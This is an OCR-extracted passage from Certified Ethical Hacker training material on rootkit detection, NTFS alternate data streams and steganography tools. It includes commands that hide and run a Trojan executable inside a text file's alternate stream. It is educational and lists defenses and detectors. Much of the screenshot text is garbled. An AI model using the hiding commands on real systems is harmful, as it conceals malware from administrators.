Disk — \Device\HarddiskO\DRO-
‘sector 0: rootkitlike behavior
TOLA@MBR code has been found
Disk \Devioe\HarddskO\DRO
GMER 2.0.18323
| WINDOWS
6.1.7600
Trace I/O.
Modules
© Ubraties
oskinlSp em32\kdcom CAWindowe\system32\kdcom dlfntoskmnLexel_strup]
CAWindone\eystema2\kdcom dock enlstsh —_C:\Windows\system32\kdcom. dijntoskinl exelKeBugChect CWindowe\ejstem2\kdcom eMHAL dH uereal in
I
[ttfte0000b98e4] \SystemRoot\systemB2\kdcom di [ex!] FF Processes {tifff80000b9b8t0) \SystemRoot\system32\kdcom dil [text] md [itit80000b9680c] \SystemRoot\system@2%kdeom di [text] ¥ Threads
IAT — CAWindows\system32\kdcom. diintoskml exelHalPrivateDi
IAT
[¥ Sections
x64
oc.
ick soon
aps
rE =a] Copy
=n
Exit
Figure 6.157: Screenshot of anti-rootkit GMER
A few more important anti-rootkits are listed as follows. =
Stinger (https://www.mcafee.com)
=
Avast One (https://www.avast.com)
=
TDSSKiller (https://usa.kaspersky.com)
=
Malwarebytes Anti-Rootkit (https://www.malwarebytes.com)
=
Rootkit Buster (http://www.trendmicro.co.in)
Module 06 Page 830
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
NTFS Data Stream
|
Inject malicious the e Hacker
NTFS Alternate Data Stream
(ADS) is a Windows hidden stream, which contains metadata for the file, such as
attributes, word count, author
name and access, and modification time of the files
Existing File
NTFS File System
ADS can fork data into existing files without changing or altering their
ADS allows an attackerto inject malicious code in files on an accessible
displayto file browsing
without being detected by the user
functionality, size, or
system and execute them
utilities
NTFS Data Stream NTFS is a filesystem that stores a file with the help of two data streams, along with the file attributes. The first data stream stores the file to be stored, such as permissions, and the second stores the another type of named data stream that can be present within each
streams, called NTFS data the security descriptor for data within a file. ADSs are file.
Alternate Stream
Alternate Stream
Alternate Stream Figure 6.158: NTFS data streams
An ADS refers to any type of data attached to a file, but not in the file on an NTFS system. master file table of the partition contains a list of all the data streams that a file contains their physical locations on the disk. Therefore, ADSs are not present in the file but attached through the file table. NTFS ADS is a Windows hidden stream that contains metadata for
Module 06 Page 831
The and to it the
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking file, such
Exam 312-50 Certified Ethical Hacker
as attributes, word
count, author name,
and access and
modification times of the
files. ADSs can fork data into existing files without changing or altering their functionality, size, or display to file-browsing utilities. They allow an attacker to inject malicious code into files on an accessible system and execute them without being detected by the user. ADSs provide attackers with a method of hiding rootkits or hacker tools on a breached system and allow a user to execute them while hiding from the system administrator. Inject malicious code in the existing
er
-
file
Hacker
Existing File
NTFS File System
Figure 6.159: Hiding files using NTFS data streams
Files with
ADS
are impossible
command
line or Windows
to detect
using native
file-browsing techniques
as the
Explorer. After an ADS file is attached to the original file, the size of
the original file does not change. The only indication modification timestamp, which can be innocuous.
Module 06 Page 832
such
that
the
file was
changed
is the
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
How to Create NTFS Streams
CE H
Notepad is stream compliant application Step 1
Step 2
Step 3
Step 4
@
Launchc:\>notepad
myfile.txt:lion.txt
®
Launchc:\>notepad
myfile.txt:tiger.txt
‘ ; ' 7 enter some data and Save the file © Click ‘Yes’ to create the new file,
F . enter some data and Save the file © Click ‘Yes’ to create the new file,
© Viewthe file size of myfile. txt (It shouldbe zero) © To view or modify the stream data hidden in step 1 and 2, use the following commands respectively: notepad
myfile.txt:lion.txt
notepad myfile.txt:tiger.txt
How to Create NTFS Streams Using NTFS data streams, an attacker can almost completely hide files within a system. It is easy to use the streams, but the user can only identify it with specific software. Explorer can display only the root files; it cannot view the streams linked to the root files and cannot define the disk space used by the streams. As such, if a virus implants itself into ADS, it is unlikely that standard
security software will identify it. When the user reads or writes a file, it manipulates the main data stream by default. We now explore how to “filename.ext:alternateName”.
create
an
ADS
for
a
file.
ADSs
follow
the
syntax:
Steps to create NTFS Streams:
1.
Launch c:\>notepad myfile.txt:lion.txt and click ‘Yes’ to create the new file, enter some data, and Save the file
2.
Launche:\>notepad myfile.txt:tiger.txt and click ‘Yes’ to create the new file, enter some data, and Save the file
3.
View the file size of myfile. txt (It should be zero)
4. The following commands can be used to view or modify stream data hidden in steps 1 and 2, respectively: notepad
myfile.txt:lion.txt
notepad
myfile.txt:tiger.txt
Note: Notepad is a stream-compliant application. You should not use alternate streams to store critical information. Module 06 Page 833
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
NTFS Stream Manipulation Location c:\ a
‘Trojan.exe (size:
1]
Move the contents of
:
il
34a §
C | EH
2 MB)
XX
“3
Location c:\
Readme.txt (size:0)
To move the contents of Trojan.exe to Readme.txt (stream): C:\>type
2 |
c:\Trojan.exe
To createa link to the Trojan.exe stream inside the Readme.txt file:
C:\>mklink backdoor.exe
3)
> c:\Readme.txt:Trojan.exe
Readme. txt:Trojan.exe
To execute the Trojan.exe inside the Readme.txt (stream), type: C:\>backdoor
NTFS Stream Manipulation You can manipulate doing the following:
=
NTFS streams to hide a malicious file in other files, such as text files, by
Hiding Trojan.exe (malicious program) in Readme.txt (stream): Use the following command to move the contents of Trojan.exe to Readme.txt (stream): c:\>type
c:\Trojan.exe
>c:\Readme.txt:Trojan.exe
The “type” command hides a file in an alternate data stream (ADS) behind an existing file. The colon (:) operator gives the command to create or use ADS.
Location c:\ i
O=0:
ceneeeeeeeeeee a a
Move the contents of
ene te Ree
scseessee>
Trojan.exe (size: 2 MB)
~~
=
Location c:\
Readme.txt (size: 0) Figure 6.160: NTFS stream manipulation
=
Creating a link to the Trojan.exe stream inside the Readme.txt file: After hiding the file Trojan.exe behind the Readme.txt file, you need to create a link to launch the Trojan.exe file from the stream. This creates a shortcut for Trojan.exe in the
stream.
C:\>mklink
Module 06 Page 834
backdoor.exe
Readme.txt:Trojan.exe
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
System Hacking
=
Exam 312-50 Certified Ethical Hacker
Executing the Trojan: Type C:\>backdoor to run the Trojan that you have hidden behind Readme.txt. Here, the backdoor is the shortcut created in the previous step, which on execution installs the Trojan.
Note: Use Notepad to read the hidden file. For example, the command c:\>notepad stream behind the sample.txt file.
Module 06 Page 835
sample.txt:secret.txt
creates the secret.txt
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
How to Defend against NTFS Streams
©
To delete NTFS streams, move the suspected files to the FAT partition
1)
Use a third-party file integrity checker such as Tripwire File Integrity Manager to maintain the integrity of an NTES partition files
©
Use programs such as Stream Detector,or GMER to detect streams
©
Enable real-time antivirus scanning to protect against the execution of malicious streams in the system
©
CE H
Use up-to-date antivirus software on the system Copyright © by
How to Defend against NTFS Streams Perform the following tasks to defend against malicious NTFS streams: To delete hidden NTFS streams, move the suspected files to a File Allocation Table (FAT) partition. Use a third-party file integrity checker such as Tripwire File Integrity maintain the integrity of NTFS partition files against unauthorized ADSs.
Manager
to
Use third-party utilities to show and manipulate hidden streams such as EventSentry SysAdmin Tools or adslist.exe. Avoid writing important or critical data to ADSs. Use up-to-date antivirus software on the system. Enable real-time antivirus streams in the system.
scanning
to
protect
Use file-monitoring software such as Stream
against
the
execution
of malicious
Detector (https://www.novirusthanks.org),
and GMER (http://www.gmer.net) to help detect the creation of additional or new data
streams.
Ensure that the firewall is configured
streams.
properly to defend
against any malicious data
For handling ADS, employ software with backup capabilities such as Symantec Backup Exec.
Monitor the specific permissions attributes. Module 06 Page 836
needed
for reading and writing the NTFS extended
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Use LADS (https://www.aldeid.com) software as a countermeasure for NTFS streams. The latest version of lads.exe is GUI-based, and it reports the existence of ADSs. It searches for either single or multiple streams, reports the presence of ADSs, and provides the full path and length of each ADS found. Other means include copying the cover file to a FAT partition and then moving it back to the NTFS. As FAT does not support ADSs, this technique effectively removes them from the original file.
Module 06 Page 837
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
‘System Hacking
NTFS Stream Detectors Stream mor
|
Stream Armor discovers hidden Alternate Data
| streams (ADS) and.cleans them completely
Stream Detector
from the system
GMER
ttn:/mgmeret
aanazazazaraee
TL
ADS Manager
‘https://dmitrybrant.com
EQ
RS seanon
8
Streams ‘ees: /docs.microsofcom
NTFS Stream Detectors There are various NTFS stream detectors available on the market. You can detect suspicious streams with the following NTFS stream detectors. You can download and install these stream detectors from their websites.
Module 06 Page 838
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
‘System Hacking =
Stream Armor
Source: https://securityxploded.com Stream Armor is a tool used to discover hidden ADSs and clean them completely from your system. Its advanced auto analysis, coupled with an online threat verification mechanism, helps you eradicate any ADSs that may be present. As shown in the screenshot, security professionals use Stream Armor to analyze and detect ADS streams in their systems.
@ stream Armor woo SecurtyXploded.com
=
Perform compete computer scan
"Now scanning: (:isers Vin Wapato Tem Scanned: [13617 faders, 33745 les
e\
soosom || 68 Stream Name l2one.identfier
ceeceeeas
ose ne: [0s 02min sec
uJ
Resits:|
25 to)
Size Stream Content Type 258 TextRle
Threat Analysis Information known Steam Fle
Gi one.tdentiier
268 TextFile
rene. denier Gh2one.ientfier
(Gi zone. identifier
Pp) 2
(Gi zone.tdentifier Gi zone. identifier
Gh zone. identifier
RARE
IESSECSF-5486-4F84-8525-17A7250A36C2 PT
(TISSUE
File Date 21-06-2018
Full Steam File Path C:\nbiscanexe:Zone.dentfier
Known Stream Fle
21-06-2019
__C:\Users\Admin\Downloads|hyena_en_x64
258. TextFe 258. Texte
Known Steam Fle Known Steam Fle
12.05-2019 25-05-2019
C:\sers\Acnn|Downloads avaSetupu2} _C:\sers\Admin\Downioads Wanagengne,
268 258 268 258 258 258 258 258
known Known known oon Known oown Known known
22.07.2019 1206-2019 1402-2011 2202-2003 01-03-2018 10-05-2019 13-06-2016 27-08-2015
C:\Jsers\Adnin|Pownioade\StreamArmor 2) C:sers\Admnn|Downloadsyrcexe:Zone. C:Wsers\dmnn\Donnloads\Sreamicmer\S C:\Jsers\Adrin\Powrioads\nbt_enum_off, _C:\isers\Admin\Pownioads\Bunde-20900-1 C:Wsers\Adnin\Donnloads hyena. en x64 _C:\sers\Adrn|Downloads\StreamArmor\S C:\Jsers\AdminPowrioads\StreamAmeor'S
268 TextFile
Known Stream File
Type Fle
02-07-2019 24-06-2019
Known Stream File Known Stream Fle
268 TextFile 268 Textile
TextFie TextFie TextFle Textile Texte TextFie TextFle TextFie
268 Textile
Steam Steam Steam Steam Stream Steam Stream Steam
Fe Fle Fle Fle Fle Fie Fle Fie
Known Stream Fle
01-03-2003
x
_C:\Users\Admin\Downloads\yibt_enum_off, _C:\Users\Admin\Downloads\Solarwinds-Oric
C:\Users\Admin\Downloads\nibt_enum off, 4
Figure 6.161: Screenshot of Stream Armor.
Some additional examples of NTFS stream detectors are listed as follows:
=
Stream Detector (https://www.novirusthanks.org)
=
GMER (http://www.gmer.net)
=
ADS Manager (https://dmitrybrant.com)
=
ADS Scanner (https://www.pointstone.com)
=
Streams (https://docs.microsoft.com)
Module 06 Page 839
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
What is Steganography?
CE H
Steganography is a technique of hiding a secret message within an ordinary message and extracting it at the destination to maintain confidentiality of data Utilizinga graphic image as a cover is the most popular method to conceal the data in files The attacker can use steganographyto hide messages such as a listof the compromised servers, source code for the hacking tool, or plans for future attacks Cover Medium
a » IPS IA, EC-Council “Hackers
|
wa
VAN a Message to be embedded
i Stego Object
Cover Medium
aa » IPS IA,
“Hackers soe *D> EC-Coundl arehere. Where are Extracted you?” message Copyright © by
What is Steganography? One of the shortcomings of various detection programs is their primary focus on streaming text data. What if an attacker bypasses normal surveillance techniques and still steals or transmits sensitive data? In a typical situation, after an attacker manages to infiltrate a firm as a temporary or contract employee, he/she surreptitiously seeks out sensitive information. While the organization may have a policy that does not allow removable electronic equipment in the facility, a determined attacker can still find ways to circumvent this by using techniques such as steganography. Steganography
refers to the art of hiding data “behind” other data without the knowledge
of
the victim. Thus, steganography hides the existence of a message. It replaces bits of unused
data into ordinary files, such as graphics, sound, text, audio, and video with other surreptitious bits. The hidden data can be in the form of plaintext or ciphertext, and sometimes, an image. Utilizing a graphic image as a cover is the most popular method to conceal the data in files. Unlike encryption, the detection of steganography can be challenging. Thus, steganography techniques are widely used for malicious purposes.
For example, attackers can hide a keylogger inside a legitimate image; thus, when the victim clicks on the image, the keylogger captures the victim’s keystrokes. Attackers also use steganography to hide information when encryption is not feasible. In terms of security, it hides the file in an encrypted format, so that even if the attacker decrypts it, the message will remain hidden. Attackers can insert information such as source code for a hacking tool, a list of compromised servers, plans for future attacks, communication and coordination channels, etc.
Module 06 Page 840
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Cover Medium
Cover Medium
ataa" at Embedding function EC-Council “Hackers are here. Where are you?”
A Message to be embedded
aa a PP
Extracting function EC-Council “Hackers
Stego Object
ssseeeesD> are here, Where are Extracted you?” message
Figure 6.162: Hiding message using steganography
Module 06 Page 841
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Classification of Steganography
CE H
Steganography
° Vv
Technical Steganography
Vv.
Linguistic Steganography
Semagrams
e
Visual Semagrams
/}
{ QZ Covered Ciphers
TextSemagrams
Q/)
| W/
Classification of Steganography Based on its technique, steganography can be classified into two areas: technical and linguistic. In technical steganography, a message is hidden using scientific methods, whereas in linguistic steganography, it is hidden in a carrier, which is the medium used to communicate or transfer messages or files. This medium comprises of the hidden message, carrier, and steganography key. The following diagram depicts the classification of steganography. Steganography
Text Semagrams
VV}
VV
e
e
Jargon Code
Figure 6.163: Classification of steganography
Module 06 Page 842
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Technical Steganography Technical steganography uses physical or chemical methods, including invisible ink, microdots, and other means, to hide the existence of a message. It is difficult to categorize all the methods by which these goals are achieved, but some examples can be listed as follows: Invisible Ink Invisible ink, or “security ink,” is one of the methods of technical steganography. It is used for invisible writing with colorless liquids and can later be made visible by certain pre-negotiated manipulations such as lighting or heating. For example, if you use onion juice and milk to write a message, the writing will be invisible, but when heat is applied to the writing, it turns brown and the message therefore becomes visible.
Applications of invisible ink are as follows: o
Espionage
o
Anti-counterfeiting
©
Property marking
o
Hand stamping for venue readmission
o
Identification marking in manufacturing
Microdots A microdot is a text or an image reverse microscope), fitting up to unintended recipients. Microdots diameter but can be converted into
considerably condensed in size (with the help of a one page in a single dot, to avoid detection by are usually circular and about one millimeter in different shapes and sizes.
Computer-Based Methods
A computer-based method makes changes to digital carriers to embed information foreign to the native carriers. Communication of such information occurs in the form of text, binary files, disk and storage devices, and network traffic and protocols. It can alter software, speech, pictures, videos, or any other digitally represented code for transmission. Computer-based Steganography Techniques Based on the cover modifications applied in the embedding process, techniques can be classified into six groups, which are as follows: o
steganography
Substitution Techniques: In this technique, the attacker tries to encode secret information by substituting the insignificant bits with the secret message. If the receiver knows the places where the attacker embeds secret information, then he/she can extract the secret message.
o
Transform Domain Techniques: The transform domain technique hides the information in significant parts of the cover image, such as cropping, compression, and some other image processing areas. This makes it more difficult to carry out
Module 06 Page 843
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
System Hacking
Exam 312-50 Certified Ethical Hacker
attacks. One can apply the transformations to blocks of images or over the entire image. Spread Spectrum Techniques: This technique is less susceptible to interception and jamming. In this technique, communication signals occupy more bandwidth than required to send the information. The sender increases the band spread by means of code (independent of data), and the receiver uses a synchronized reception with the code to recover the information from the spread spectrum data. Statistical Techniques: This technique utilizes the existence of “1-bit” steganography schemes by modifying the cover in such a way that, when transmission of a “1” occurs, some of the statistical characteristics change significantly. In other cases, the cover remains unchanged, to distinguish between the modified and unmodified covers. The theory of hypothesis from mathematical statistics helps in extraction. Distortion Techniques: In this technique, the user implements a sequence of modifications to the cover to obtain a stego-object. The sequence of modifications represents the transformation of a specific message. The decoding process in this technique requires knowledge about the original cover. The receiver of the message can measure the differences between the original cover and the received cover to reconstruct the sequence of modifications. Cover Generation Techniques: In this technique, digital objects are developed specifically to cover secret communication. When this information is encoded, it ensures the creation of a cover for secret communication. Linguistic Steganography
This type of steganography hides the message in the carrier of another classification of linguistic steganography includes semagrams and open codes.
file.
Further
Semagrams Semagrams involve a steganography technique that hides information with the help of signs or symbols. In this technique, the user embeds some objects or symbols in the data to change the appearance of the data to a predetermined meaning. The classification of semagrams is as follows: o
Visual Semagrams: This technique hides information in a drawing, painting, letter, music, or a symbol.
o
Text Semagrams: A text semagram hides the text message by converting or transforming the appearance of the carrier text message, such as by changing font sizes and styles, adding extra spaces as whitespaces in the document, and including different flourishes in letters or handwritten text.
Open Codes Open code hides the secret message in a legitimate carrier message specifically designed in a pattern on a document that is unclear to the average reader. The carrier message is sometimes also known as the overt communication, and the secret message Module 06 Page 844
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
as the covert communication. The open-code technique consists of two main groups: jargon codes and covered ciphers. o
Jargon Codes: In this type of steganography, a certain language is used that can be understood by the particular group of people to whom it is addressed, while being meaningless to others. A jargon message is like a substitution cipher in many respects, but instead of replacing individual letters, the words themselves are changed. An example of a jargon code is “cue” code. A cue is a word that appears in the text and then transports the message.
o
Covered Ciphers: This technique hides the message in a carrier medium visible to everyone. This type of message can be extracted by any person with knowledge of the method used to hide it. Further classification of cover ciphers includes null ciphers and grille ciphers. e
Null ciphers: A technique used to hide the message within a large amount of useless data. The original data are mixed with the unused data in any order horizontally, diagonally, vertically, or in reverse so that no one can understand it other than those who know the order.
¢
Grille ciphers: A technique used to encrypt plaintext by writing it onto a sheet of paper through a pierced (or stenciled) sheet of paper, cardboard, or any other similar material. In this technique, one can decipher the message using an identical grille. This system is thus difficult to crack and decipher, as only someone with the correct grille will be able to decipher the hidden message.
Module 06 Page 845
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Types of Steganography based on Cover Medium
if | EH
EE
ce steganography
Ey
web steganography
|2 |
Document Steganography
| 3 |
Spam/Email Steganography
Eh
folder steganography
EE
sovo-nom steganography
FE
viseo steganography
FE]
natural text steganography
Eh
rusio steganography
FEY
tissen os steganography
EE
mnie space steganography
FE
c++ Source-code steganography $s Reserved. Reproduction
Steganography Tools
CE H
Whitespace Steganography
Sht one Data Hiding
Fy Leonel s
erecta
Image Steganography
a
x ||| @swssa
‘Hide data in harmless looking files
a
feadie Hiding ere ete Using | [tM (Ceara Help Goes
[C:sers'Acmntrator Desktop Document. tt
= (Aa vant eerie ro
(Gat ms fer provi nad) te ented came menage hack es)
ean, re oe
a npn gn avert =
esi
zi co
-
x
SEES
Destpgecet watt
Cover Fle
(Peta) | ous siege Fie Protal watermarking
SF
Document Steganography
[chen ontinde
es " veneers
=
= tome
Enter Password
ps:/punn opestego.com
htps://sourceforge ne
Types of Steganography based on Cover Medium Steganography is the art and science of writing hidden messages in such a way that no one other than the intended recipient knows of the existence of the message. The increasing use of electronic file formats with new technologies has made data hiding possible. Basic steganography can be broken down into two areas: data hiding and document making. Document making deals with protection against removal. Its further classifications of cover medium include watermarking and fingerprinting. Module 06 Page 846
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
The different types of steganography are as follows:
Image Steganography Document steganography Folder Steganography Video Steganography Audio Steganography Whitespace Steganography Web Steganography Spam/Email Steganography DVD-ROM Steganography Natural Text Steganography Hidden OS Steganography C++ Source-Code Steganography
Whitespace Steganography Whitespace steganography is used to conceal messages in ASCII text by adding whitespaces to the ends of the lines. Because spaces and tabs are generally not visible in text viewers, the message is effectively hidden from casual observers. If built-in encryption is used, the message cannot be read even if it is detected.
Snow Source: http://www.darkside.com.au Snow is a program for concealing messages in text files by appending tabs and spaces to the ends of lines, and for extracting messages from files containing hidden messages. The user hides the data in the text file by appending sequences of up to seven spaces, interspersed with tabs. This usually allows three bits to be stored every eight columns. There is an alternative encoding scheme that uses alternating spaces and tabs to represent Os and 1s. However, users rejected it because it uses fewer bytes but requires more columns per bit (4.5 vs. 2.67). An appended tab character is an indication of the start of the data, which allows the insertion of mail and news headers without corrupting the data. As shown in the screenshot, attackers use the Snow tool to hide messages in a text file using the following command: Syntax: snow [ -CQS ] [ -p passwd ] [ -I line-len ] [ -f file | -m message ] [ infile [ outfile ]]
Options:
o
-C: Compress the data if concealing, or uncompress it if extracting.
Module 06 Page 847
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
o
-Q: Quiet mode. If not set, the program reports statistics percentages and the amount of available storage space used.
o
-S: Report on the approximate amount of space available for a hidden message in the text file. Line length is valid but ignore other options.
©
-p password: If this is set, data encryption concealment, or decryption during extraction.
o
-Iline-length: When appending whitespaces, Snow will always produce lines shorter than this value. By default, the line length is 80.
o.
-f message-file: The input text file will hide the contents of this file.
oO
-mmessage-string: The input text file will hide the contents of this string. Note that, unless a new line is somehow included in the string, it will not appear in the extracted message.
occurs
with
such
this
as compression
password
during
{BH Command Prompt
Figure 6.164: Screenshot of Snow
Image Steganography Images are the most popular cover objects used for steganography. Image steganography allows you to conceal your secret message within an image. You can exploit the redundant bits of the image to conceal your message within it. These redundant bits are those parts of the image that have very little effect on it if altered. The detection of this alteration is not easy. You can conceal your information within images of different formats (e.g., .PNG, JPG, .BMP). Images are popular “cover objects” used for steganography by replacing redundant bits of image data with the message, in such a way that human eyes cannot detect the effect. Image steganography is classified into two types: image domain and transform domain. In image domain (spatial) techniques, a user embeds the messages directly in the intensity of the pixels. In transformdomain (frequency) techniques, first, the transformation of images occurs; then the user embeds the message in the image. The following figure depicts the image steganography tools in the process.
Module 06 Page 848
process and the role of steganography
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
System Hacking
, -
q--->A4 aS = Steganography Stego Tool Image
Steganography Tool
Information
:
ms
ae
©
Cover Image
Information
Figure 6.165: Image steganography process
Image File Steganography Techniques =
Least-Significant-Bit Insertion
The least-significant-bit insertion technique is the most commonly used technique of image steganography, in which the least significant bit (LSB) of each pixel helps hold secret data. The LSB is the rightmost bit of each pixel of an image. In the LSB insertion method, the binary data of the message are broken up and inserted into the LSB of each pixel in the image file in a deterministic sequence. Modifying the LSB does not result in a visible difference because the net change is minimal and can be indiscernible to the human eye. Thus, its detection is difficult.
Hiding the data: o
The stego tool makes a copy of an image palette with the help of the red, green, and blue (RGB) model
o
Each pixel of the 8-bit binary number LSB is substituted with one bit of the hidden
o
Anew RGB color in the copied palette is produced
o
With the new RGB color, the pixel is changed to an 8-bit binary number
message
Suppose you have chosen a 24-bit image represent in digital form, as follows: (00100111 11101001 00100111 11101001)
11001000)
to hide your
(00100111
secret
11001000
data, which
11101001)
you
can
(11001000
Suppose you want to hide the letter “H” in the above 24-bit image. The system represents the letter “H” by binary digits 01001000. To hide this “H,” you can change the previous stream to: (00100110
11101001
11001000)
(00100110
11001001
11101000)
(11001000
00100110
11101001)
01001000 Figure 6.166: Example of LSB insertion
Module 06 Page 849
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
You just need to replace the LSB of each pixel of the image file, as shown in the figure. To retrieve this H at the other side, the recipient combines all the LSB image bits and is thus able to detect the H. =
Masking and Filtering Masking and filtering techniques exploit the limitations of human vision, which is incapable of detecting slight changes in images. Grayscale images and digital watermarks can hide information in a way similar to that of watermarks on paper. Masking allows you to conceal secret data by placing the data in an image file. You can use masking and filtering techniques on 24-bit-per-pixel and grayscale images. To hide secret messages, you must adjust the luminosity and opacity of the image. If the change in luminance is insignificant, then people other than the intended recipients will fail to notice that the image contains a hidden message. This technique can be easily applied as the image remains undisturbed. In most cases, users perform masking of JPEG images. Lossy JPEG images are relatively immune to cropping and compression image operations. Hence, you can hide your information in lossy JPEG images, often using the masking technique. If a message hides in significant areas of the picture, the steganography image encoded with a marking degrades at a lower rate under JPEG compression.
Masking techniques can be detected with simple statistical analysis but are resistant to lossy compression and image cropping. The information is not hidden in the noise but in the significant areas of the image. =
Algorithms and Transformation The algorithms and transformation technique involves hiding secret information during image compression. In this technique, the user conceals the information by applying various compression algorithms and transformation functions. A compression algorithm and transformation uses a mathematical function to hide the coefficient of the least bit during image compression. The data are embedded in the cover image by changing the coefficients of a transformation of an image. Generally, JPEG images are the most suitable for compression, as they can function at different compression levels. This technique provides a high level of invisibility of secret data. JPEG images use a discrete cosine transform to achieve compression.
There are three types of transformation used in the compression algorithm: o
Fast Fourier transformation
o
Discrete cosine transformation
o
Wavelet transformation
If the user embeds the information in the spatial domain of the LSB insertion technique,
information hidden in the images can be vulnerable to attacks. An attacker can utilize simple signal-processing techniques and damage the information hidden in the image when using the LSB insertion technique. This may refer to the loss of information when the image undergoes certain processing techniques like compression. To overcome Module 06 Page 850
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
these problems, one can hide the information with frequency-domain-based techniques such
as
fast
Fourier
transformation,
discrete
cosine
transformation,
or
wavelet
transformation. Digital data are not continuous in the frequency domain. Analysis of the image data, to which frequency domain transformations are applied, becomes
extremely challenging, which renders cryptanalysis attacks difficult to be performed. Image Steganography Tools =
OpenStego
Source: https://www.openstego.com OpenStego is a steganography application that provides the following functions. o
Data Hiding: It can hide any data within a cover file (e.g., images)
o
Watermarking: Watermarking files (e.g., images) with an invisible signature. It can be used to detect unauthorized file copying. & Openstego
Eile Help
Data Hiding Hide Data “
Extract Data Digital Watermarking (Beta) & Generate Signature
-
C:\Users \Administrator \Desktop Document. txt
Ccover File
(elect muttiole files or provide wildcard (*, 2) to embed same message in multiple files) C:\Users Administrator \Desktop \bike. jog
Output Stego Fle C:\Users Administrator Desktop \output_file.bmp Options
Encryption Algorithm
fa
Password
Verify Watermark
x
Hide data in harmless looking files MessageFile
&
Embed Watermark
oO
reeie Eeeesmen
‘AES128
v
eeecceee
eovcecee| Hide Data
Figure 6.167: Screenshot of OpenStego
Some examples of image steganography tools are as follows:
=
StegOnline (https://stegonline.georgeom.net)
=
Coagula (https://www.abc.se)
=
QuickStego (http://quickcrypto.com)
=
SSuite Picsel (https://www.ssuitesoft.com)
=
CryptaPix (https://www. briggsoft.com)
Module 06 Page 851
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Document Steganography Document steganography is the technique of hiding secret messages transferred in the form of documents. It includes the addition of whitespaces and tabs at the ends of lines. A stegodocument is a cover document comprising the hidden message. Steganography algorithms, referred to as the “stego system,” are employed to hide the secret messages in the cover medium at the sender end. The same algorithm is used by the recipient to extract the hidden message from the stego-document. The following diagram illustrates the document steganography process:
«0
Document Files
“ee aS
Steg Tool
Information
_a
2. 3
Document Files
as
Steg Tool
Information
Figure 6.168: Document steganography process
Document Steganography Tools Document steganography tools help in hiding files within documents, such as text or html files, using steganography methods. =
StegoStick
Source: https://sourceforge.net StegoStick is a steganographic tool that allows attackers to hide any file in any other file. It is based on image, audio, or video steganography, which hides any file or message in an image (BMP, JPG, GIF, etc.), audio/video (MPG, WAV, etc.), or any other file format
(PDF, EXE, CHM, etc.).
[@ stegostick
-
x
StegoStick Readme Hiding UnHiding Help License
“et Secret File (C:\Users\Admnistrator Desktop\Secret text. txt
browse
Cover File Cco\sers\Adminstrator Desktop sland. jog
bronse
Destinatios (C:\Users\Adrinstrator Desktop Enter Password
~
browse sevens
C=
Figure 6.169: Screenshot of StegoStick
Module 06 Page 852
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
